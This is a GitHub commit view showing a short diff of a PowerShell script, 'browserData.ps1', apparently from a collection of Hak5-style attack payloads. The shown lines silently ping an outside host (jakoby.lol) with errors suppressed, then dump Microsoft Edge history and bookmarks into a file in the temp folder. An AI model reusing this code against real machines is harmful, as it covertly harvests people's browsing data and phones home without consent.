Update browserData.ps1

This commit is contained in:
I-Am-Jakoby 2023-06-13 21:47:44 -05:00 committed by GitHub
parent 6f2b103f4e
commit 2f66ede071
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -31,7 +31,7 @@ function Get-BrowserData {
}
}
}
iwr "https://jakoby.lol/hak5" -EA 0 >$null
Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\--BrowserData.txt
Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\--BrowserData.txt